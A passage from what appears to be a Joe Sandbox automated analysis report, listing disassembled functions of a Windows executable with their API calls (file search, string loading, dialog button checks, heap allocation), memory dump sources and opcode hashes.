                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                              • Opcode ID: b7434d0ace942d153212df3c47e16d6f2957190157adf300bf89ec24e181dcfc
                                                                                                                                                                                                              • Instruction ID: 765bfc1fb5723da4cae4e437953573f52ca7260df73e082a8a7e8208fdba2ce5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7434d0ace942d153212df3c47e16d6f2957190157adf300bf89ec24e181dcfc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17419DA1E196C2C3FB64FB3598502FAA3A1AF84B40F98503AD90D47691DF3DEC85C364
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC1E1C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                              • Opcode ID: 6bacc15e939ad4406d12e76bf0ac23a0958011e7a90d5b98d1f4f1c03ba716d5
                                                                                                                                                                                                              • Instruction ID: d2d907a1814980cbe84205e68ee6d41864131e8788a484ac3cfb97490b3edde6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bacc15e939ad4406d12e76bf0ac23a0958011e7a90d5b98d1f4f1c03ba716d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2113736A1D6C3C6E710BF60A4405BAE2A4FF44380FDC0535E69D96A96DF3CE9518724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB30E4 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB3190: GetModuleHandleW.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31B7
                                                                                                                                                                                                              • DloadProtectSection.DELAYIMP ref: 00007FF75FBB3155
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DloadHandleModuleProtectSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2883838935-0
                                                                                                                                                                                                              • Opcode ID: 443a6fb85f2ce70add07ed126bc374300d244f559177922aa332cece75ec9c3b
                                                                                                                                                                                                              • Instruction ID: 5121464f3113d0a73b7062c75e88ce9fa9707dc0b836019bbdaaa922f98db1a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 443a6fb85f2ce70add07ed126bc374300d244f559177922aa332cece75ec9c3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86110CA1D586C3C7FB50BB74A8807F1D394AF04788FCC0135D90C462A5DE3CA9CA8235
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC05D4 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 9d1df724ef77f75cd06070d672878072096d2f1e4dbb48faf7da0b7853a72c1b
                                                                                                                                                                                                              • Instruction ID: 19289193ae5dbe9c85184129a972c033eda05bd6e73cbdd2e73076a81a925073
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d1df724ef77f75cd06070d672878072096d2f1e4dbb48faf7da0b7853a72c1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF04944B19287C6FE657F7599112F7E2845F88BD0FCC4430884EC72C2EE2CE9818A34
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B770 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: FindFirstFileW.KERNELBASE(?,00007FF75FB9B79F), ref: 00007FF75FB9B93D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: FindFirstFileW.KERNEL32 ref: 00007FF75FB9B96E
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B8F8: GetLastError.KERNEL32 ref: 00007FF75FB9B97D
                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 00007FF75FB9B7A8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1464966427-0
                                                                                                                                                                                                              • Opcode ID: 758af1dd85113a8cb817686491269d3df0c0a8f55231bf401f0df110ebb4b438
                                                                                                                                                                                                              • Instruction ID: e04d8705d74193cbc669c4eb96fcaaf822ba116406924351bce9871945a5c1f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 758af1dd85113a8cb817686491269d3df0c0a8f55231bf401f0df110ebb4b438
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F081229086C2C6EB11AA7192412E8B3209B59BF5F4C8335DABD0B3D7CD5C91858730
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA38FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9FDF8: LoadStringW.USER32 ref: 00007FF75FB9FE7F
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9FDF8: LoadStringW.USER32 ref: 00007FF75FB9FE98
                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF75FBB258D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: GetDlgItem.USER32 ref: 00007FF75FBB18C5
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: ShowWindow.USER32 ref: 00007FF75FBB18EB
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1900
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1918
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1939
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1955
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1998
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19AC
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19C0
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB19EA
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBB1890: IsDlgButtonChecked.USER32 ref: 00007FF75FBB1A02
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ButtonChecked$LoadString$ItemShowWindowswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2482695087-0
                                                                                                                                                                                                              • Opcode ID: fff7c9e4bc2c3cd4619abb028f25086067d4fe82ef5478c64b149bd87a6a94ce
                                                                                                                                                                                                              • Instruction ID: a82488e3f4fe82ed8c17ab55c9eb27aee90fa36d43f94a3c4341497daa85303f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fff7c9e4bc2c3cd4619abb028f25086067d4fe82ef5478c64b149bd87a6a94ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF0E211B086C586FA207671E9163FE8381AF853C8FD84131FAAE077DBDC2CCA444710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A630 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF75FB9A5DD), ref: 00007FF75FB9A658
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              • Opcode ID: 212cc4bace8085fef6627fbed83f48c3325ef587dbe45b8668402039f2d85827
                                                                                                                                                                                                              • Instruction ID: 5cc45ec2ec5d1857dd46df46a70780d8163d3a7f960e9f9f32f365a2ef0ba37e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 212cc4bace8085fef6627fbed83f48c3325ef587dbe45b8668402039f2d85827
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0A462A08782D4FB64AB34EA443B9B664DB41FB8F9D5334D63C451C4CF28D8958720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBDA58 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 03faee5455a41d0970fd0e63024c1e613f6af730e0fa59899db6ed1bb8cc88bc
                                                                                                                                                                                                              • Instruction ID: 2db11bc5f8ca98cdf3d181c75b814597b2c54f18a69c8c63fb0af491f5866d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03faee5455a41d0970fd0e63024c1e613f6af730e0fa59899db6ed1bb8cc88bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F0F840F1D687C6FE547BB199412F5E2809F8C7A0F8C4730DE2E862CADE6CAC818538
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB38A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 680105476-0
                                                                                                                                                                                                              • Opcode ID: 4dfc08cdeeb08750f013b755c6ed595e0fed9c9534be3c03a2b3033aab705a33
                                                                                                                                                                                                              • Instruction ID: e3cb7e7c6f69ca69652e97217aa69e2fefa56bb896334a82337c3a356bcc4c1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dfc08cdeeb08750f013b755c6ed595e0fed9c9534be3c03a2b3033aab705a33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E0EC50E9D187C3F95832B218161F981404F19370EDC1B30DD3D082C3AD1DEC56823E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9AB44 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 749574446-0
                                                                                                                                                                                                              • Opcode ID: 11b1f2b1018e56caa8821faeaad5060e4c750f80eb2c4ba6fef7761e7ec45562
                                                                                                                                                                                                              • Instruction ID: a6f95966d5b5fe76f9e7c8987cee1bd6868810fe73275704e7971f5696652660
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b1f2b1018e56caa8821faeaad5060e4c750f80eb2c4ba6fef7761e7ec45562
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E08C56B20596C2EB20BB7AC8516AA9322AF8DBC4F8C1030CE0C07761CE28D4818710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBE700 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1180542099-0
                                                                                                                                                                                                              • Opcode ID: 2a68aa68cf5e032bdbfc7122639fa2b42e0c491799a00a6c7e79bf908a7bab57
                                                                                                                                                                                                              • Instruction ID: aac0d546401c2a5c869b178dbff9221e6802c122a32976125eb82448481a0581
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a68aa68cf5e032bdbfc7122639fa2b42e0c491799a00a6c7e79bf908a7bab57
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E0B660E0E2C3D6E9987B3288420F9A2502F25314FDC1A75E01E821E2ED2E69065A3A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB2318 Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3015471070-0
                                                                                                                                                                                                              • Opcode ID: f1b4ed78b98df09309aff98c44a847ef4ec68267f435a55d52b31d39372f1c85
                                                                                                                                                                                                              • Instruction ID: c4a32bf484b086da80431acc418baa3ad6ef80a9e570a4f6ec067491a9faefef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4ed78b98df09309aff98c44a847ef4ec68267f435a55d52b31d39372f1c85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D0A794F096C5C2F720B711A4153F983507F55B80F940234D94D0E791CE6CD1274B50
                                                                                                                                                                                                              Uniqueness

